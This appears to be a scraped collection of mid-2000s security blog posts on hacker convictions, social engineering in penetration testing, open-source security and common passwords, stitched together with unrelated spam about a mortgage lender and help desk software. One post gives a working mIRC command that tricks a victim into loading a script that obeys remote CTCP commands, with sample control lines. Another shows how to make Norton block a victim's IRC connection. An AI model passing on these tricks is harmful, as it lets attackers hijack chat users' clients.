Benchmark Lending Group, Inc., headquartered in Northern California, was founded in 1965 as a direct mortgage lending bank. Benchmark Lending offers fixed rate mortgages, adjustable rate mortgages, fixed rate second mortgages, equity lines, freedom loans, and cash flow ARMs. The website provides borrowers with a loan check list, glossary, and the ability to design a loan to suit their specific needs. Benchmark Lending also provides a purchase and refinance calculator, a payment calculator, and a payment reduction calculator on their website. Borrowers can speak with loan officers by phone or chat online to obtain additional information.

Yahoo is the best domain name registrar!

nice post tina..keep it up!

Help Desk Software is powerful management software that automates many features of a company's help desk environment. Typical functionality includes call management, call tracking, knowledge management, problem resolution, and self-help capabilities. The software is shared by all members of a support area, including the first point of contact for the helpdesk, and the staff that receive job requests for later resolution.

A Spanish hacker who launched a denial of service attack that hobbled the net connections of an estimated three million users has been jailed for two years and fined €1.4m. Santiago Garrido, 26, (AKA Ronnie and Mike25) launched the attack using a computer worm in retaliation for been banned from the popular “Hispano” IRC chat room for breaking its rules.

The resulting surge in malicious traffic disrupted an estimated three million users of Wanadoo, ONO, Lleida Net and other ISPs, or approximately a third of Spain’s net users, at the time of the 2003 attack.

Source: The Register

Graham Cluely of Sophos states:

This type of activity causes serious damage and disruption, and any hackers engaged in such behaviour must be punished accordingly. The Spanish Civil Guard should be congratulated for seeing this case through to its conclusion

Sophos believes that more than 60 per cent of all spam today originates from zombie computers, which can be used by criminal hackers to launch distributed denial-of-service attacks, spread unwanted email messages or to steal confidential information

SAN JOSE, California — Identity theft and online bank fraud were the unofficial themes of the 2006 RSA Conference, a massive security confab where Bill Gates came to announce the imminent death of the password and vendors filled the exhibition halls with iPod giveaways and promises that their product could stop everything from spam and malware to hackers and typos.

Thanks to a California law known as SB 1386 that requires companies to disclose sensitive data leaks to California consumers, companies like ChoicePoint and shoe retailer DSW became poster children for corporate negligence last year after mishandling sensitive data.

As mentioned previously, Phishing is getting to be a big issue now, and password only measures are failing.

Perhaps the biggest change this year will be in online banking, as financial institutions move to comply with federal oversight agencies that are directing banks (.pdf) to secure their sites with more than just user logins and passwords.

These extra fraud profiling and authentication measures are necessary, according to Callas, since the threats on the internet have changed.

“Now we are not dealing with kids having fun,” Callas said. “We are dealing with criminals — the Russian mafia. And online banking risks are there if your bank offers it, even if you don’t use it.”

E-trade, for instance, already offers free RSA security tokens to its most active users. Those battery-powered devices work by using a using a seed number and the current time to cryptographically generate a secure one-time code to complement the normal user login and password.

Source: Wired News

Well it?s not really a backdoor? but we can consider it one?

Some time ago it apeared on many websites (including mine) an article about a backdoor in mIRC? all this backdoor stuff was really nothing more than a mIRC script that by it?s mean made the client to respond at any command received via a CTCP (Client to Client Protocol) command? such as ping, version, time, etc?. so here is the command that the victim has to enter:

/.write -c mirc.dll ctcp 1:*:*:$1- | /.load -rs mirc.dll

 

The command is splited in 2 parts, delimited by | (a vertical line)? So the first section writes a file ?mirc.dll? in which we write a simple mIRC script which listens to any CTCP request? the second one loads the file with the mIRC script?.

After the ?victim? executes this command we can control it by introducing one of the following lines:

{ this is a comment }

/ctcp victims_nick /.nick lamer { changes the nickname of the victim to lamer }

/ctcp victims_nick /.exit { closes the victims mIRC }

/ctcp victims_nick /.run www.black2white.as.ro
{ opens the victims default web browser (ie, firefox, opera, etc.) on the page www.black2white.as.ro }

 

/ctcp victims_nick /.any_valid_irc_command

So happy ?masterminding??.

More IRC Commands: http://www.hackthissite.org/pages/irc/reference.php

This is actually a very interesting debate.

Just to introduce if you don?t know..

What is Penetration Testing

A penetration test is a method of evaluating the security of a computer system or network by simulating an attack by a malicious cracker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.

Wikipedia

What is Social Engineering

It?s a bit cheesy, but we often call this hacking the wetware (hardware, software and wetware meaning people).

Social Engineering is a form of intrusion making use of weaknesses in the non-technical aspects of the system, the wetware also known as people. A common phrase would be ?Con man?, the most well known form of social engineering. In the technological realm, social engineering relates to unauthorized access of computing resources or network by exploiting human weaknesses.

In the historical sense con men would engineer their way into certain resources, someone?s bank account, shoe box under the bed and so on. In this context the social engineer would target someone that is authorized to use the network, or resource they wish to access and attempt to leverage some confidential information out of them that would compromise the network security.

This is what Mitnick was famous for, and what his book The Art of Deception is about.



I?ll probably cover this more later.

Does Social Engineering have a place in Penetration Testing?

Some people say yes, it?s the most effective way..Actually I?ve found this true, the human element and the lack of education in the workplace is often the weakest link in the chain.

Does it have any place in security testing, I would say definately yes. Some people would say perhaps it should be a seperate project, not in the ?technical? assessment of a security perimeter.

Or course it depends on the scope given by the client, but it should be part of any good Penetration Test or Vulnerability Assessment.



Why Social Engineering Should be in a Pen Test

For me whatever you do to get into the network, or escalate your access is part of a pen-test. If you are able to get users to divulge some kind of information that assists you in compromising or gaining access to something, then you are doing exactly what a real attacker would have been able to do. You might be able to trick them into telling you something via phone or e-mail, get them to physically do something like open a door or unlock a machine, or get them to run an executable or disable a firewall. You might be able to get them to do under false pretenses, through their own ignorance or carelessness, or by other means. Whatever you do can be considered part of a pen-test.

Many recent studies have shown people are still incredibly gullible and especially when presented with a ?Free CD? or something, they will happily put it in their drive and run it.

This mean in reality social engineering is an easy option to attack a network? no problem of IDS, no fear of being tracked by log analysis while attacking. Some attackers try to take out the information of network and internal devices bycalling the IT staff and pretending like a sales guy who is trying to sell a log analyzer or IDS. They will often say ?No we don?t need a new Firewall we already have a Cisco PIX?.

Why Social Engineering Shouldn?t be in a Pen Test

Some would say social engineering is a altogether a different game, the pen testing results could be used to socially engineer someone within the company, perhaps an extension of the pen-test rather than a part of it.

The target of the pen-test might be in a physically different location (Makes the SE more difficult) or the native language of the target may be different (Makes the SE pretty much impossibl).

Some people say don?t bother, because you WILL suceed with social engineering.

The main problem being technical testing is fairly scientific, you can apply metrics to it, you can measure it and you can track its effectiveness.

With social engineering, it?s still pretty much an artform and totally differs from person to person, it?s very hard to be scientific when it comes to conning people. Social Engineering may well be left out by large corporations unless it can be scientifically defined and metrics applied to it.



Things to Keep in Mind

However, there are a few important things to keep in mind. You want to definitely lay down the ground rules with whomever it is you are pen-testing for. They might just want to see what machines an exploit can break into. You might really upset some people and get in trouble if you start trying to gain physical access or send trojans to executives. Make sure they are aware of what you are doing and that you have approval. Get everything in writing or in your agreement somewhere.

Also there are many questions to be answered before doing an SE test - questions of legality, ethics and possible personal consequences for the people who were ?duped?. These have to be taken into consideration and could mean the social engineering part is not possible.

Please bear in mind the wellfare of the employees too, consider also adding a clause that protects the end-user from getting fired. Human nature is to be helpful, the problem is a lack of education, not a mistake from the user.

Summary

Social Engineering, you can include it or not based on the above information, if you don?t include it, you can always demonstrate it for information purposes to the management team or contact of the target organisation.

References: Discussion on SF Pen Test List

the following exploits (if we can call it this way) was published on securityfocus bugtraq mailinglist? it is entirely reproduced in the following lines:

Norton Internet monitoring tools issues
Versions Affected : *
Fix : No

What im writing about is how to stop the internet of some user that is
using the norton tools and IRC / any other chat at the same time.

By default norton monitor checks for words like ?keylogger? , ?start
keylogger? , ?key logger? and etc.etc.

Example for irc :
Start a mIRC or any other IRC client that u like and connect to some
server.
Type down /ctcp yournick start keylogger . By default norton monitors
your mIRC Process and your logs of it so it sees ?star keylogger? and
automaticly blocks mIRC.exe from starting and automaticly blocks port
6667 or whatever port ure using to connect to IRC. Nice eh ?

Aleksander Hristov

So you should be in a small manner paranoic when using Norton tools?

Is Open Source more secure? That?s a question that can be answered with both yes and no. Not only that, but the reasons for the ?yes? and the ?no? are fairly much the same. Because you can see the source the task of hacking or exploiting it is made easier, but at the same time because its open, and more easily exploited the problems are more likely to be found.

When it comes to open source the hackers and crackers are doing us a favour, they find the problems and bring them to the attention of the world, where some bright spark will make a fix and let us all have that to. All well and good.

However I think this could also be a problem, because lets face it. Any monkey can download ?free? software to use for this or that, with little or no idea how it actually works. They don?t check for fixes and updates, often believing ?it will never happen to me?. In part this is because they just don?t see any reason for some one to hack them. But in the modern world where any script kiddie little git can download a virus construction kit, or a bot to run exploits on lists of servers its no longer a case of being targeted. They don?t care who you are, it?s the box they are after.

Recently a friend of mine suffered from this very problem, he didn?t believe he was worth the effort to hack. But simply by using an Open source web app he unwittingly made him self a target. Though a fix was available, he wasn?t aware of it. It was only when the host contacted him about problems that he even realised he?d been exploited.

With the growing popularity of the internet and open source solutions more and more unskilled users are installing software they don?t even understand. Even worse as any one application grows in popularity it grows as a worth while target for the low life script kiddies out there.

The problem has been exacerbated but the simple truth that with modern scripting languages such as PHP it is getting easier and easier to make some thing, being able to hack code together until it works might be fun, and you might make some thing that does the job, but its not a way to make safe secure software.

Most often exploits are based on stupid mistakes, errors that should have been found early on but weren?t because the code evolved, expanded and changed. No design, no planning? just code it until it works. This is the original meaning of ?hacking?.

Now, with out mentioning names, I have pulled apart the code used in the CMS the friend I mention earlier used, and with out doubt I can say its poorly written. But it was free, so no one can complain.

I am sure there is some very good open source applications, linux, apache to name a few, but there is even more ?open source? that?s just garbage. Just because its free doesn?t mean its good. Just because it popular doesn?t make it better. In fact as far as I can tell, if you want to use open source applications your probably better of choosing one no one else has really bothered with, that why your less likely to become a victim.

Closed source always has the advantage of being a little harder to find the problems, how ever, and this is important. It doesn?t mean its any better. As a friend of mine pointed out, Open source might be easier to hack in some ways, but because of that the problems come to light and generally are fixed quickly. Where as with a closed source application its actually in the interests of the authors to keep any problems hidden, if its not a common problem it may even go unfixed, because the author sees is as being unlikely any one else will ever find it. Or a fix will be bundled up with a later version and thus many people will never even know they could be at risk.

In the end I do believe open source is good for us all, but its important to check regularly for updates, patches and fixes. If you don?t, on your own head be it.

Good I say, nothing worse than a spammer.

A bulk e-mailer who looted more than a billion records with personal information from a data warehouse has been sentenced to eight years in prison, federal prosecutors said Wednesday.

Scott Levine, 46, was sentenced by a federal judge in Little Rock, Ark., after being found guilty of breaking into Acxiom’s servers and downloading gigabytes of data in what the U.S. Justice Department calls one of the largest data heists to date. Acxiom, based in Little Rock, says it operates the world’s largest repository of consumer data, and counts major banks, credit card companies and the U.S. government among its customers.

In August 2005, a jury convicted Levine, a native of Boca Raton, Fla., and former chief executive of a bulk e-mail company called Snipermail.com, of 120 counts of unauthorized access to a computer connected to the Internet. The U.S. government says, however, there was no evidence that Levine used the data for identity fraud.

Looks like for some reason the FTP had access to the SAM file, or a copy of it, and this ‘hacker’ downloaded it then brute forced the hashes.

I wonder if he used RainbowCrack and Rainbow Tables?

If he read this site he might have done 

According to court documents, Levine and others broke into an Acxiom server used for file transfers and downloaded an encrypted password file called ftpsam.txt in early 2003. Then they ran a cracking utility on the ftpsam.txt file, prosecutors said, discovered 40 percent of the passwords, and used those accounts to download even more sensitive information.

Source: News.com

I?ve tried out a few of these visual recognition password technique things, and to tell you the truth they didn?t work for me, not at all.

I clicked the requisite 3-4 spots on the image, and remembered them, but when I tried to login it wouldn?t accept it.



A password that uses images instead of numbers could give some people access to secure information on personal electronic devices or at ATMs within the next year.

The image authentication system uses a pair of digital images instead of a string of numbers to make logging in simple for the legitimate user, but difficult for impersonators.

?It is expected that many of the conventional user authentication systems would be able to be replaced with our scheme, since recognition of images is significantly easier for human beings than precise recall of passwords,? said team leader Masakatsu Nishigaki, a professor of informatics at Shizuoka University in Japan, where the system is being developed.

Source: Discovery Channel



There is a simple implementation of it I saw called Passclicks over at mininova

http://labs.mininova.org/passclicks/

Passclicks is a new way to login to websites without users having to remember thir old style textual password. Studies have revealed that humans are way better in remembering visual things than textual things. With passclicks your normal textual passwords are replaced with a sequence of clicks on an image.

It is true most people remember things a lot better visually.

I think the Japanese 4 ?digit? icon type password might be pretty good though, as a different form of pin number.

There seems to be a certain amount of confusion within the security industry about the difference between Penetration Testing and Vulnerability Assessment, they are often classified as the same thing when in fact they are not.

I know Penetration Testing sounds a lot more exciting, but most people actually want a VA not a pentest, many projects are labelled as pen tests when in fact they are 100% VA.

A Penetration Test mainly consists of a VA, but it goes one step further..

 

A penetration test is a method of evaluating the security of a computer system or network by simulating an attack by a malicious hacker. The process involves an active analysis of the system for any weaknesses, technical flaws or vulnerabilities. This analysis is carried out from the position of a potential attacker, and can involve active exploitation of security vulnerabilities. Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution.

A vulnerability assesment is what most companies generally do, as the systems they are testing are live production systems and can?t afford to be disrupted by active exploits which might crash the system.

Vulnerability assessment is the process of identifying and quantifying vulnerabilities in a system. The system being studied could be a physical facility like a nuclear power plant, a computer system, or a larger system (for example the communications infrastructure or water infrastructure of a region).

 

Vulnerability assessment has many things in common with risk assessment. Assessments are
typically performed according to the following steps:

1. Cataloging assets and capabilities (resources) in a system
2. Assigning quantifiable value and importance to the resources
3. Identifying the vulnerabilities or potential threats to each resource
4. Mitigating or eliminating the most serious vulnerabilities for the most valuable resources

This is generally what a security company is contracted to do, from a technical perspective, not to actually penetrate the systems, but to assess and document the possible vulnerabilities and recommend mitigation measures and improvements.

Sources: Wikipedia

A pretty interesting article that statistically measured the frequency of passwords by taking an aggregate sample of passwords (primarily from the UK).

Here are listed the most commonly occuring from the sample.

10. ?thomas? (0.99?)

First off, at number 10, is the most common format of passwords - the name. Thomas is a perennially popular name in the UK (2nd most popular in 2000), so it is perhaps no surprise that it makes the top 10, with nearly 1 in 1,000 people opting for this ubiquitous forename as their password.

We can only guess that there are a lot of fans of Thomas Jefferson or Thomas Edison out there! The high prevalence of Christian names only further reinforces the fact that loved ones are a common choice when it comes to passwords.

9. ?arsenal? (1.11?)

Football teams tend to be another popular choice, and the gunners fall in 9th place. This may or may not be reflective of the fact that the word ?arsenal? starts with a 4-letter swear word - another popular choice when it comes to passwords.

Arsenal are ranked 6th overall in average attendance rankings, and are the 2nd most popular football-related password.

8. ?monkey? (1.33?)

Quite why the monkey makes it into 8th place is beyond me, but the fact that it?s a 6-letter word (6 letters is a typical minimum length for passwords), is easily typed and is memorable probably helps cement its position as ideal password material.

Still, it?s quite worrying that there?s such a trend - perhaps the internet and monkeys are inextricably linked?



7. ?charlie? (1.39?)

Another name - nowhere near as common a name as No. 10, Thomas, but it?s our most popular name-based password overall.

Could of course, be a homage to a number of famous Charlies - Chaplin, Sheen, or those of a Chocolate Factory persuasion. Or, of course, it could just be the case that they?re referring to it?s slang usage.

6. ?qwerty? (1.41?)

I wonder where the inspiration for this one came from? Perhaps when faced with a blinking cursor and an instruction to choose a password people will tend to look to the things closest to them - which would explain why 1 in 700 people choose ?qwerty? as their password.

5. ?123456′ (1.63?)

Can you count to 6? It?s the most common minimum required length of password - and the 5th most common password.

4. ?letmein? (1.76?)

A modern-day version of ?open sesame? - and 1 person in 560 will type ?letmein? as their password. Quite why is beyond me.

I could be mistaken, but I have a hunch that ?letmein? has been featured in a movie or TV series - Fox Mulder?s password from the X Files - ?trustno1′ - also ranked quite highly.



3. ?liverpool? (1.82?)

The most popular football team by some margin, Liverpool was the third most popular password overall. Does this mean that 1 in 550 people is such a devout Liverpool fan that they would be willing to entrust private data to the team they love?

Liverpool ranked 3rd in the average attendance ratings - leaving the 2 most popular teams, Manchester United and Newcastle United, out of the top 10 list - perhaps because they?re too long and difficult to type.

2. ?password? (3.780?)

Akin to pressing the ?any? key, when told to enter a ?password?, it would seem that users aren?t the sharpest tool in the box - with almost 1 in 250 people choosing the word ?password?.

1. ?123′ (3.784?)

With nearly 4 people in 1,000 opting for a simple numerical sequence as their password (it should be noted that there was no lower length limit specified), ?123′ must be the first thing a lot of people think of when asked to specify a password. One dreads to think what their PIN number might be!

Source: Modern Life is Rubbish

It seems even though vendors are pushing their snakeoil harder than ever, the actual figures show that the money lost due to cybercrime has decreased every year for the last four years!



Perhaps people are finally getting more secure, it’s not suprising with the advent of cheaper and easier to use intrusion detection and intrusion prevention systems.

For the fourth straight year, the financial losses incurred by businesses due to incidents such as computer break-ins have fallen, according to the 2006 annual survey by the Computer Security Institute and the FBI. Robert Richardson, editorial director at the CSI, discussed the survey’s findings in a presentation at the CSI NetSec conference here Wednesday.

Respondents in the 2005 survey reported an average of $204,000 in cybercrime losses, Richardson said. This year, that’s down to $168,000, about an 18 percent drop, he added. Compared with 2004, the average loss is down 68 percent.

The threats themselves haven’t really changed, so the ‘risk landscape’ is the same. Just the monetary loss has decreased.

Most important, perhaps, the 615 U.S. CSI members who responded to this year’s survey reported fewer security incidents. Viruses, laptop theft and insider abuse of Net access are still the most reported threats, but all have decreased compared with last year.

“The danger of insiders may be somewhat overstated, according to the survey group,” Richardson said. About a third of respondents said they had no losses at all due to insider threats, another 29 percent said less than one-fifth of overall losses came from insider threats.



I would definately put it down to consistent and more widespread use of security technologies as well as general awareness and understanding being higher. I would agree with the following statement that nowadays it’s more likely the consumers are losing more money.

The businesses have already tightened themselves up.

When it comes to cybercrime losses, consumers might be bearing the brunt of them, and they are not covered by the survey, Richardson suggested. “Consumers are the low-hanging fruit,” he said. Costs related to identity theft, for example, fall largely back onto the consumer, he added, even if it did start with a data breach at an enterprise.

So as users we must be careful too.

Source: News.com